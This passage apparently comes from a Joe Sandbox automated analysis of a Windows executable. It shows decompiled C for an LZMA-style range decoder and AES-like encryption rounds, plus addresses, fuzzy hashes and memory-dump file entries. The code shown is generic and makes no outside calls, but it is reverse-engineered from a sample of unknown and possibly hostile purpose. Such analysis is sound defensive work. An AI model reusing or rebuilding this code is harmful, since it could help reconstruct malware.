												_t323 = _t323 - _t235;
												L63:
												_t225 =  *(_t351 + 0x28);
												 *(_t351 + 0x20) = 0xc;
												_t296 =  *((intOrPtr*)(_t351 + 0x14)) + 0xa68;
												goto L64;
											} else {
												if(_t235 >= 0x1000000 || _t179 <  *(_t351 + 0x10)) {
													return 3;
												} else {
													goto L2;
												}
											}
										} else {
											if(_t179 >=  *(_t351 + 0x10)) {
												goto L2;
											} else {
												_t287 = _t228 << 8;
												_t323 = _t323 << 0x00000008 |  *_t179 & 0x000000ff;
												_t179 =  &(_t179[1]);
												 *(_t351 + 0x28) = _t179;
												goto L48;
											}
										}
									}
								} else {
									if(_t225 >=  *(_t351 + 0x10)) {
										goto L2;
									} else {
										_t285 = _t285 << 8;
										_t323 = _t323 << 0x00000008 |  *_t225 & 0x000000ff;
										 *(_t351 + 0x28) =  &(_t225[1]);
										goto L44;
									}
								}
							} else {
								_t288 = _t157;
								 *(_t351 + 0x20) = 0;
								_t296 = _t293 + 0x664;
								 *(_t351 + 0x1c) = 2;
								L64:
								_t161 =  *_t296 & 0x0000ffff;
								if(_t288 >= 0x1000000) {
									L67:
									_t238 = (_t288 >> 0xb) * _t161;
									_t162 =  *(_t351 + 0x28);
									if(_t323 >= _t238) {
										_t341 = _t296[1] & 0x0000ffff;
										_t289 = _t288 - _t238;
										_t325 = _t323 - _t238;
										if(_t289 >= 0x1000000) {
											L72:
											_t241 = (_t289 >> 0xb) * _t341;
											if(_t325 >= _t241) {
												_t290 = _t289 - _t241;
												_t325 = _t325 - _t241;
												_t205 =  &(_t296[0x102]);
												_t342 = 0x10;
												 *(_t351 + 0x18) = 0x100;
											} else {
												_t342 = 8;
												_t290 = _t241;
												_t205 = _t296 + 0x104 + (_t204 + _t204) * 8;
												 *(_t351 + 0x18) = 8;
											}
											goto L75;
										} else {
											if(_t162 >=  *(_t351 + 0x10)) {
												goto L2;
											} else {
												_t289 = _t289 << 8;
												_t325 = _t325 << 0x00000008 |  *_t162 & 0x000000ff;
												_t162 =  &(_t162[1]);
												 *(_t351 + 0x28) = _t162;
												goto L72;
											}
										}
									} else {
										_t290 = _t238;
										_t205 = _t296 + 4 + (_t204 + _t204) * 8;
										_t342 = 0;
										 *(_t351 + 0x18) = 8;
										L75:
										_t297 = 1;
										L76:
										while(1) {
											if(_t290 >= 0x1000000) {
												L79:
												_t244 = (_t290 >> 0xb) * (_t205[_t297] & 0x0000ffff);
												if(_t325 >= _t244) {
													_t290 = _t290 - _t244;
													_t325 = _t325 - _t244;
													_t297 = _t297 + _t297 + 1;
												} else {
													_t290 = _t244;
													_t297 = _t297 + _t297;
												}
												_t164 =  *(_t351 + 0x18);
												if(_t297 >= _t164) {
													_t298 = _t297 + _t342 - _t164;
													if( *(_t351 + 0x20) >= 4) {
														goto L20;
													} else {
														if(_t298 >= 4) {
															_t298 = 3;
														}
														_t344 =  *(_t351 + 0x28);
														_t206 = (_t298 << 7) +  *((intOrPtr*)(_t351 + 0x14)) + 0x360;
														_t300 = 1;
														do {
															_t168 =  *(_t206 + _t300 * 2) & 0x0000ffff;
															if(_t290 >= 0x1000000) {
																goto L91;
															} else {
																if(_t344 >=  *(_t351 + 0x10)) {
																	goto L2;
																} else {
																	_t290 = _t290 << 8;
																	_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
																	_t344 =  &(_t344[1]);
																	goto L91;
																}
															}
															goto L113;
															L91:
															_t247 = (_t290 >> 0xb) * _t168;
															if(_t325 >= _t247) {
																_t290 = _t290 - _t247;
																_t325 = _t325 - _t247;
																_t300 = _t300 + _t300 + 1;
															} else {
																_t290 = _t247;
																_t300 = _t300 + _t300;
															}
														} while (_t300 < 0x40);
														_t301 = _t300 - 0x40;
														if(_t301 < 4) {
															goto L21;
														} else {
															_t251 = (_t301 >> 1) - 1;
															if(_t301 >= 0xe) {
																_t169 =  *(_t351 + 0x10);
																_t252 = _t251 - 4;
																do {
																	if(_t290 >= 0x1000000) {
																		goto L102;
																	} else {
																		if(_t344 >= _t169) {
																			goto L2;
																		} else {
																			_t290 = _t290 << 8;
																			_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
																			_t344 =  &(_t344[1]);
																			goto L102;
																		}
																	}
																	goto L113;
																	L102:
																	_t290 = _t290 >> 1;
																	_t325 = _t325 - ((_t325 - _t290 >> 0x0000001f) - 0x00000001 & _t290);
																	_t252 = _t252 - 1;
																} while (_t252 != 0);
																 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0x644;
																_t251 = 4;
																goto L104;
															} else {
																 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0x55e + (((_t301 & 0x00000001 | 0x00000002) << _t251) - _t301) * 2;
																L104:
																_t207 = 1;
																do {
																	_t171 =  *( *((intOrPtr*)(_t351 + 0x14)) + _t207 * 2) & 0x0000ffff;
																	if(_t290 >= 0x1000000) {
																		goto L108;
																	} else {
																		if(_t344 >=  *(_t351 + 0x10)) {
																			goto L2;
																		} else {
																			_t290 = _t290 << 8;
																			_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
																			_t344 =  &(_t344[1]);
																			goto L108;
																		}
																	}
																	goto L113;
																	L108:
																	_t310 = (_t290 >> 0xb) * _t171;
																	if(_t325 >= _t310) {
																		_t290 = _t290 - _t310;
																		_t325 = _t325 - _t310;
																		_t207 = _t207 + _t207 + 1;
																	} else {
																		_t290 = _t310;
																		_t207 = _t207 + _t207;
																	}
																	_t251 = _t251 - 1;
																} while (_t251 != 0);
																goto L21;
															}
														}
													}
												} else {
													_t162 =  *(_t351 + 0x28);
													continue;
												}
											} else {
												if(_t162 >=  *(_t351 + 0x10)) {
													goto L2;
												} else {
													_t290 = _t290 << 8;
													_t325 = _t325 << 0x00000008 |  *_t162 & 0x000000ff;
													 *(_t351 + 0x28) =  &(_t162[1]);
													goto L79;
												}
											}
											goto L113;
										}
									}
								} else {
									if(_t225 >=  *(_t351 + 0x10)) {
										goto L2;
									} else {
										_t288 = _t288 << 8;
										_t323 = _t323 << 0x00000008 |  *_t225 & 0x000000ff;
										 *(_t351 + 0x28) =  &(_t225[1]);
										goto L67;
									}
								}
							}
						} else {
							if(_t225 >=  *(_t351 + 0x10)) {
								goto L2;
							} else {
								_t284 = _t284 << 8;
								_t322 = _t322 << 0x00000008 |  *_t225 & 0x000000ff;
								_t225 =  &(_t225[1]);
								 *(_t351 + 0x28) = _t225;
								goto L39;
							}
						}
					} else {
						_t291 = _t153;
						 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0xe6c;
						if(_t292[0xc] != 0 || _t292[0xb] != 0) {
							_t265 = _t292[9];
							if(_t265 == 0) {
								_t265 = _t292[0xa];
							}
							 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + ((( *(_t292[5] + _t265 - 1) & 0x000000ff) >> 8 -  *_t292) + (((0x00000001 << _t292[1]) - 0x00000001 & _t292[0xb]) <<  *_t292)) * 0x600;
						}
						if(_t340 >= 7) {
							_t270 = _t292[9];
							_t215 = _t292[0xe];
							if(_t270 >= _t215) {
								_t190 = 0;
							} else {
								_t190 = _t292[0xa];
							}
							_t271 =  *(_t292[5] - _t215 + _t270 + _t190) & 0x000000ff;
							_t216 = 0x100;
							_t319 = 1;
							while(1) {
								_t272 = _t271 + _t271;
								_t192 = _t216 & _t272;
								 *(_t351 + 0x20) = _t272;
								 *(_t351 + 0x18) =  *( *((intOrPtr*)(_t351 + 0x14)) + (_t192 + _t319 + _t216) * 2) & 0x0000ffff;
								if(_t291 >= 0x1000000) {
									goto L31;
								}
								_t279 =  *(_t351 + 0x28);
								if(_t279 >=  *(_t351 + 0x10)) {
									goto L2;
								} else {
									_t291 = _t291 << 8;
									_t321 = _t321 << 0x00000008 |  *_t279 & 0x000000ff;
									 *(_t351 + 0x28) =  &(_t279[1]);
									goto L31;
								}
								goto L113;
								L31:
								_t278 = (_t291 >> 0xb) *  *(_t351 + 0x18);
								if(_t321 >= _t278) {
									_t290 = _t291 - _t278;
									_t321 = _t321 - _t278;
									_t319 = _t319 + _t319 + 1;
								} else {
									_t290 = _t278;
									_t319 = _t319 + _t319;
									_t192 =  !_t192;
								}
								_t216 = _t216 & _t192;
								if(_t319 >= 0x100) {
									goto L19;
								} else {
									_t271 =  *(_t351 + 0x20);
									continue;
								}
								goto L113;
							}
						} else {
							_t281 = 1;
							do {
								_t320 =  *( *((intOrPtr*)(_t351 + 0x14)) + _t281 * 2) & 0x0000ffff;
								if(_t291 >= 0x1000000) {
									goto L15;
								} else {
									_t197 =  *(_t351 + 0x28);
									if(_t197 >=  *(_t351 + 0x10)) {
										goto L2;
									} else {
										_t291 = _t291 << 8;
										_t321 = _t321 << 0x00000008 |  *_t197 & 0x000000ff;
										 *(_t351 + 0x28) =  &(_t197[1]);
										goto L15;
									}
								}
								goto L113;
								L15:
								_t196 = (_t291 >> 0xb) * _t320;
								if(_t321 >= _t196) {
									_t291 = _t291 - _t196;
									_t321 = _t321 - _t196;
									_t281 = _t281 + _t281 + 1;
								} else {
									_t291 = _t196;
									_t281 = _t281 + _t281;
								}
							} while (_t281 < 0x100);
							L19:
							 *(_t351 + 0x1c) = 1;
							L20:
							_t344 =  *(_t351 + 0x28);
							L21:
							if(_t290 >= 0x1000000 || _t344 <  *(_t351 + 0x10)) {
								return  *(_t351 + 0x1c);
							} else {
								goto L2;
							}
						}
					}
				} else {
					_t199 =  *(_t351 + 0x28);
					if(_t199 <  *(_t351 + 0x10)) {
						_t283 = _t283 << 8;
						_t321 = _t321 << 0x00000008 |  *_t199 & 0x000000ff;
						 *(_t351 + 0x28) =  &(_t199[1]);
						goto L4;
					} else {
						L2:
						return 0;
					}
				}
				L113:
			}

0x0040f327
0x0040f32d
0x0040f330
0x0040f333
0x0040f338
0x0040f33b
0x0040f34e
0x0040f353
0x0040f35c
0x0040f366
0x0040f38e
0x0040f393
0x0040f39a
0x0040f526
0x0040f52a
0x0040f52e
0x0040f530
0x0040f53a
0x0040f544
0x0040f560
0x0040f565
0x0040f56c
0x0040f58b
0x0040f58d
0x0040f58f
0x0040f597
0x0040f5a5
0x0040f5c1
0x0040f5c6
0x0040f5c9
0x0040f5cf
0x0040f638
0x0040f63c
0x0040f63e
0x0040f648
0x0040f652
0x0040f66e
0x0040f673
0x0040f67a
0x0040f680
0x0040f688
0x0040f68a
0x0040f692
0x0040f6ae
0x0040f6b3
0x0040f6b8
0x00000000
0x0040f6ba
0x0040f6ba
0x0040f6ba
0x00000000
0x0040f694
0x0040f698
0x00000000
0x0040f69e
0x0040f6a4
0x0040f6a7
0x0040f6aa
0x00000000
0x0040f6aa
0x0040f698
0x0040f67c
0x0040f67c
0x00000000
0x0040f67c
0x0040f654
0x0040f658
0x00000000
0x0040f65e
0x0040f664
0x0040f667
0x0040f669
0x0040f66a
0x00000000
0x0040f66a
0x0040f658
0x0040f5d1
0x0040f5d9
0x0040f5dd
0x0040f5e1
0x0040f5e9
0x0040f607
0x0040f60c
0x0040f611
0x0040f6be
0x0040f6be
0x0040f6c0
0x0040f6c2
0x0040f6c6
0x0040f6ca
0x0040f6d2
0x00000000
0x0040f617
0x0040f61d
0x0040f635
0x00000000
0x00000000
0x00000000
0x0040f61d
0x0040f5eb
0x0040f5ef
0x00000000
0x0040f5f5
0x0040f5f8
0x0040f600
0x0040f602
0x0040f603
0x00000000
0x0040f603
0x0040f5ef
0x0040f5e9
0x0040f5a7
0x0040f5ab
0x00000000
0x0040f5b1
0x0040f5b7
0x0040f5ba
0x0040f5bd
0x00000000
0x0040f5bd
0x0040f5ab
0x0040f56e
0x0040f56e
0x0040f570
0x0040f578
0x0040f57e
0x0040f6d8
0x0040f6d8
0x0040f6e1
0x0040f6fd
0x0040f702
0x0040f705
0x0040f70b
0x0040f721
0x0040f725
0x0040f727
0x0040f72f
0x0040f74b
0x0040f750
0x0040f755
0x0040f76d
0x0040f76f
0x0040f771
0x0040f777
0x0040f77c
0x0040f757
0x0040f759
0x0040f75e
0x0040f760
0x0040f767
0x0040f767
0x00000000
0x0040f731
0x0040f735
0x00000000
0x0040f73b
0x0040f741
0x0040f744
0x0040f746
0x0040f747
0x00000000
0x0040f747
0x0040f735
0x0040f70d
0x0040f70f
0x0040f711
0x0040f715
0x0040f717
0x0040f784
0x0040f784
0x00000000
0x0040f790
0x0040f796
0x0040f7b2
0x0040f7bb
0x0040f7c0
0x0040f7c8
0x0040f7ca
0x0040f7cc
0x0040f7c2
0x0040f7c2
0x0040f7c4
0x0040f7c4
0x0040f7d0
0x0040f7d6
0x0040f7e0
0x0040f7e7
0x00000000
0x0040f7ed
0x0040f7f0
0x0040f7f2
0x0040f7f2
0x0040f7fb
0x0040f802
0x0040f809
0x0040f810
0x0040f810
0x0040f81a
0x00000000
0x0040f81c
0x0040f820
0x00000000
0x0040f826
0x0040f82d
0x0040f830
0x0040f832
0x00000000
0x0040f832
0x0040f820
0x00000000
0x0040f833
0x0040f838
0x0040f83d
0x0040f845
0x0040f847
0x0040f849
0x0040f83f
0x0040f83f
0x0040f841
0x0040f841
0x0040f84d
0x0040f852
0x0040f858
0x00000000
0x0040f85e
0x0040f862
0x0040f866
0x0040f885
0x0040f889
0x0040f890
0x0040f896
0x00000000
0x0040f898
0x0040f89a
0x00000000
0x0040f8a0
0x0040f8a7
0x0040f8aa
0x0040f8ac
0x00000000
0x0040f8ac
0x0040f89a
0x00000000
0x0040f8ad
0x0040f8ad
0x0040f8b9
0x0040f8bb
0x0040f8bb
0x0040f8c8
0x0040f8cc
0x00000000
0x0040f868
0x0040f87f
0x0040f8d1
0x0040f8d1
0x0040f8e0
0x0040f8e4
0x0040f8ee
0x00000000
0x0040f8f0
0x0040f8f4
0x00000000
0x0040f8fa
0x0040f901
0x0040f904
0x0040f906
0x00000000
0x0040f906
0x0040f8f4
0x00000000
0x0040f907
0x0040f90c
0x0040f911
0x0040f919
0x0040f91b
0x0040f91d
0x0040f913
0x0040f913
0x0040f915
0x0040f915
0x0040f921
0x0040f921
0x00000000
0x0040f924
0x0040f866
0x0040f858
0x0040f7d8
0x0040f7d8
0x00000000
0x0040f7d8
0x0040f798
0x0040f79c
0x00000000
0x0040f7a2
0x0040f7a8
0x0040f7ab
0x0040f7ae
0x00000000
0x0040f7ae
0x0040f79c
0x00000000
0x0040f796
0x0040f790
0x0040f6e3
0x0040f6e7
0x00000000
0x0040f6ed
0x0040f6f3
0x0040f6f6
0x0040f6f9
0x00000000
0x0040f6f9
0x0040f6e7
0x0040f6e1
0x0040f546
0x0040f54a
0x00000000
0x0040f550
0x0040f556
0x0040f559
0x0040f55b
0x0040f55c
0x00000000
0x0040f55c
0x0040f54a
0x0040f3a0
0x0040f3a0
0x0040f3af
0x0040f3b3
0x0040f3bb
0x0040f3c0
0x0040f3c2
0x0040f3c2
0x0040f3f2
0x0040f3f2
0x0040f3f9
0x0040f48c
0x0040f48f
0x0040f494
0x0040f49b
0x0040f496
0x0040f496
0x0040f496
0x0040f4a4
0x0040f4a8
0x0040f4ad
0x0040f4b2
0x0040f4b6
0x0040f4ba
0x0040f4bc
0x0040f4ca
0x0040f4d4
0x00000000
0x00000000
0x0040f4d6
0x0040f4de
0x00000000
0x0040f4e4
0x0040f4ea
0x0040f4ed
0x0040f4f0
0x00000000
0x0040f4f0
0x00000000
0x0040f4f4
0x0040f4f9
0x0040f500
0x0040f50a
0x0040f50c
0x0040f50e
0x0040f502
0x0040f502
0x0040f504
0x0040f506
0x0040f506
0x0040f512
0x0040f51a
0x00000000
0x0040f520
0x0040f520
0x00000000
0x0040f520
0x00000000
0x0040f51a
0x0040f3ff
0x0040f3ff
0x0040f410
0x0040f414
0x0040f41e
0x00000000
0x0040f420
0x0040f420
0x0040f428
0x00000000
0x0040f42e
0x0040f434
0x0040f437
0x0040f43a
0x00000000
0x0040f43a
0x0040f428
0x00000000
0x0040f43e
0x0040f443
0x0040f448
0x0040f450
0x0040f452
0x0040f454
0x0040f44a
0x0040f44a
0x0040f44c
0x0040f44c
0x0040f458
0x0040f460
0x0040f460
0x0040f468
0x0040f468
0x0040f46c
0x0040f472
0x0040f489
0x00000000
0x00000000
0x00000000
0x0040f472
0x0040f3f9
0x0040f368
0x0040f368
0x0040f370
0x0040f384
0x0040f387
0x0040f38a
0x00000000
0x0040f375
0x0040f375
0x0040f37b
0x0040f37b
0x0040f370
0x00000000

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27156ca4970ad7a14cafdd4d0f561c0251ce2efe8b7cb58f4bb8e0a1a151ff8a
Instruction ID: 462305fb0b224e09127741abaf40dbbd09e9997c9276ae30905a80483bc5e455
Opcode Fuzzy Hash: 27156ca4970ad7a14cafdd4d0f561c0251ce2efe8b7cb58f4bb8e0a1a151ff8a
Instruction Fuzzy Hash: AD020772A042114BD728CE28C580279BBE2FBC5350F110A3FE896A7AD4D778994DCB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6A0, Relevance: .3, Instructions: 298
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040A6A0(intOrPtr* __eax, signed int* __ecx) {
				signed int* _t167;
				unsigned int _t169;
				unsigned int _t176;
				unsigned int _t209;
				unsigned int _t216;
				unsigned int _t230;
				unsigned int _t234;
				signed int* _t275;
				unsigned int _t290;
				unsigned int _t306;
				unsigned int _t316;
				unsigned int _t319;
				signed int _t326;
				signed int _t335;
				void* _t432;

				_t319 =  *(__eax + 0x14) ^ __ecx[1];
				_t169 =  *(__eax + 0x1c) ^ __ecx[3];
				_t234 =  *(__eax + 0x10) ^  *__ecx;
				 *((intOrPtr*)(_t432 + 0x10)) =  *__eax;
				_t209 =  *(__eax + 0x18) ^ __ecx[2];
				 *(_t432 + 0x30) = _t209;
				 *(_t432 + 0x14) = _t209 >> 0x00000008 & 0x000000ff;
				 *(_t432 + 0x34) = _t169;
				_t216 =  *(0x4201f0 + (_t169 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41fdf0 +  *(_t432 + 0x14) * 4) ^  *(0x4205f0 + (_t234 >> 0x18) * 4) ^  *(0x41f9f0 + (_t319 & 0x000000ff) * 4) ^  *(__eax + 0x24);
				_t306 =  *(0x4201f0 + (_t209 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41fdf0 + (_t319 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4205f0 + (_t169 >> 0x18) * 4) ^  *(0x41f9f0 + (_t234 & 0x000000ff) * 4) ^  *(__eax + 0x20);
				_t167 = __eax + 0x20;
				_t326 =  *(0x4201f0 + (_t319 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41fdf0 + (_t234 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4205f0 + ( *(_t432 + 0x30) >> 0x18) * 4) ^  *(0x41f9f0 + ( *(_t432 + 0x34) & 0x000000ff) * 4) ^ _t167[3];
				_t176 =  *(0x41fdf0 + (_t169 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4201f0 + (_t234 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4205f0 + (_t319 >> 0x18) * 4) ^  *(0x41f9f0 + ( *(_t432 + 0x30) & 0x000000ff) * 4) ^ _t167[2];
				_t52 = _t432 + 0x10;
				 *_t52 =  *((intOrPtr*)(_t432 + 0x10)) - 1;
				 *(_t432 + 0x1c) = _t216;
				 *(_t432 + 0x24) = _t326;
				if( *_t52 != 0) {
					do {
						_t290 =  *(0x4201f0 + (_t326 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41fdf0 + (_t176 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4205f0 + (_t306 >> 0x18) * 4) ^  *(0x41f9f0 + ( *(_t432 + 0x1c) & 0x000000ff) * 4) ^ _t167[5];
						_t335 =  *(0x41fdf0 + (_t326 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4201f0 + (_t306 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4205f0 + ( *(_t432 + 0x1c) >> 0x18) * 4) ^  *(0x41f9f0 + (_t176 & 0x000000ff) * 4) ^ _t167[6];
						_t230 =  *(0x4201f0 + (_t176 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41fdf0 + (_t216 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4205f0 + (_t326 >> 0x18) * 4) ^  *(0x41f9f0 + (_t306 & 0x000000ff) * 4) ^ _t167[4];
						 *(_t432 + 0x14) = _t306 >> 0x00000008 & 0x000000ff;
						_t316 =  *(0x4201f0 + ( *(_t432 + 0x1c) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41fdf0 +  *(_t432 + 0x14) * 4) ^  *(0x4205f0 + (_t176 >> 0x18) * 4) ^  *(0x41f9f0 + ( *(_t432 + 0x24) & 0x000000ff) * 4) ^ _t167[7];
						_t167 =  &(_t167[8]);
						 *(_t432 + 0x18) =  *(0x4201f0 + (_t335 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41fdf0 + (_t290 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4205f0 + (_t316 >> 0x18) * 4) ^  *(0x41f9f0 + (_t230 & 0x000000ff) * 4) ^  *_t167;
						 *(_t432 + 0x1c) =  *(0x4201f0 + (_t316 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41fdf0 + (_t335 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4205f0 + (_t230 >> 0x18) * 4) ^  *(0x41f9f0 + (_t290 & 0x000000ff) * 4) ^ _t167[1];
						_t216 =  *(_t432 + 0x1c);
						_t306 =  *(_t432 + 0x18);
						_t326 =  *(0x4201f0 + (_t290 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41fdf0 + (_t230 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4205f0 + (_t335 >> 0x18) * 4) ^  *(0x41f9f0 + (_t316 & 0x000000ff) * 4) ^ _t167[3];
						_t176 =  *(0x41fdf0 + (_t316 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4201f0 + (_t230 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4205f0 + (_t290 >> 0x18) * 4) ^  *(0x41f9f0 + (_t335 & 0x000000ff) * 4) ^ _t167[2];
						_t137 = _t432 + 0x10;
						 *_t137 =  *((intOrPtr*)(_t432 + 0x10)) - 1;
						 *(_t432 + 0x24) = _t326;
					} while ( *_t137 != 0);
				}
				 *( *(_t432 + 0x3c)) = ((( *((_t176 >> 0x00000010 & 0x000000ff) + 0x41c040) & 0x000000ff | ( *((_t326 >> 0x18) + 0x41c040) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t216 >> 0x00000008 & 0x000000ff) + 0x41c040) & 0x000000ff) << 0x00000008 |  *((_t306 & 0x000000ff) + 0x41c040) & 0x000000ff) ^ _t167[4];
				( *(_t432 + 0x3c))[1] = ((( *((_t326 >> 0x00000010 & 0x000000ff) + 0x41c040) & 0x000000ff | ( *((_t306 >> 0x18) + 0x41c040) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t176 >> 0x00000008 & 0x000000ff) + 0x41c040) & 0x000000ff) << 0x00000008 |  *((_t216 & 0x000000ff) + 0x41c040) & 0x000000ff) ^ _t167[5];
				_t275 =  *(_t432 + 0x3c);
				_t275[2] = ((( *((_t306 >> 0x00000010 & 0x000000ff) + 0x41c040) & 0x000000ff | ( *((_t216 >> 0x18) + 0x41c040) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t326 >> 0x00000008 & 0x000000ff) + 0x41c040) & 0x000000ff) << 0x00000008 |  *((_t176 & 0x000000ff) + 0x41c040) & 0x000000ff) ^ _t167[6];
				_t275[3] = ((( *((_t216 >> 0x00000010 & 0x000000ff) + 0x41c040) & 0x000000ff | ( *((_t176 >> 0x18) + 0x41c040) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t306 >> 0x00000008 & 0x000000ff) + 0x41c040) & 0x000000ff) << 0x00000008 |  *((_t326 & 0x000000ff) + 0x41c040) & 0x000000ff) ^ _t167[7];
				return _t167;
			}

0x0040a6b2
0x0040a6b5
0x0040a6b8
0x0040a6bc
0x0040a6c3
0x0040a705
0x0040a71d
0x0040a74e
0x0040a752
0x0040a75a
0x0040a7bc
0x0040a7d9
0x0040a7dc
0x0040a7df
0x0040a7df
0x0040a7e3
0x0040a7e7
0x0040a7eb
0x0040a7f1
0x0040a8a3
0x0040a8b7
0x0040a8c3
0x0040a8d2
0x0040a905
0x0040a942
0x0040a949
0x0040a992
0x0040a9e1
0x0040a9fe
0x0040aa12
0x0040aa14
0x0040aa17
0x0040aa17
0x0040aa1b
0x0040aa1b
0x0040a7f1
0x0040aa7a
0x0040aad2
0x0040ab26
0x0040ab30
0x0040ab79
0x0040ab80

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84f162616a20772e74dd71631627c3c9c1bca9b9439662ba305608b213246b3c
Instruction ID: 83bfa8493028414e067c23257a90e250144b075ccba9c150ccd2a674e287ec71
Opcode Fuzzy Hash: 84f162616a20772e74dd71631627c3c9c1bca9b9439662ba305608b213246b3c
Instruction Fuzzy Hash: 9CD1F77199436B4FD354EF8DEC8163677A2AF88300F4A8234CA541B363D6387917DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB90, Relevance: .3, Instructions: 297
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040AB90(signed int* __eax, signed int* __ecx) {
				signed int* _t165;
				signed int* _t166;
				unsigned int _t188;
				unsigned int _t227;
				unsigned int _t239;
				signed int _t242;
				unsigned int _t245;
				unsigned int _t252;
				unsigned int _t268;
				unsigned int _t273;
				signed int _t341;
				unsigned int _t345;
				signed int* _t386;
				unsigned int _t395;
				unsigned int _t399;
				signed int _t406;
				void* _t435;

				_t242 =  *__eax;
				 *(_t435 + 4) = _t242;
				_t165 = __eax + (_t242 << 5) + 0x10;
				_t245 = _t165[3] ^ __ecx[3];
				_t399 = _t165[2] ^ __ecx[2];
				_t345 = _t165[1] ^ __ecx[1];
				_t273 =  *_t165 ^  *__ecx;
				 *(_t435 + 0x34) = _t245;
				 *(_t435 + 0x28) = _t273;
				_t227 =  *(0x41ede8 + (_t245 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41f1e8 + (_t399 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41f5e8 + (_t345 >> 0x18) * 4) ^  *(0x41e9e8 + (_t273 & 0x000000ff) * 4) ^  *(_t165 - 0x10);
				_t252 =  *(0x41f1e8 + (_t245 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41ede8 + (_t273 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41f5e8 + (_t399 >> 0x18) * 4) ^  *(0x41e9e8 + (_t345 & 0x000000ff) * 4) ^  *(_t165 - 0xc);
				_t166 = _t165 - 0x20;
				_t188 =  *(0x41ede8 + (_t345 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41f1e8 + (_t273 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41f5e8 + ( *(_t435 + 0x34) >> 0x18) * 4) ^  *(0x41e9e8 + (_t399 & 0x000000ff) * 4) ^ _t166[6];
				_t406 =  *(0x41ede8 + (_t399 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41f1e8 + (_t345 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41f5e8 + ( *(_t435 + 0x28) >> 0x18) * 4) ^  *(0x41e9e8 + ( *(_t435 + 0x34) & 0x000000ff) * 4) ^ _t166[7];
				_t51 = _t435 + 0x10;
				 *_t51 =  *((intOrPtr*)(_t435 + 0x10)) - 1;
				 *(_t435 + 0x18) = _t227;
				 *(_t435 + 0x1c) = _t252;
				if( *_t51 != 0) {
					do {
						 *(_t435 + 0x14) = _t227 >> 0x00000008 & 0x000000ff;
						_t268 =  *(0x41ede8 + (_t252 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41f1e8 + ( *(_t435 + 0x18) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41f5e8 + (_t406 >> 0x18) * 4) ^  *(0x41e9e8 + (_t188 & 0x000000ff) * 4) ^ _t166[2];
						_t239 =  *(0x41f1e8 + (_t406 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41ede8 +  *(_t435 + 0x14) * 4) ^  *(0x41f5e8 + (_t188 >> 0x18) * 4) ^  *(0x41e9e8 + (_t252 & 0x000000ff) * 4) ^ _t166[1];
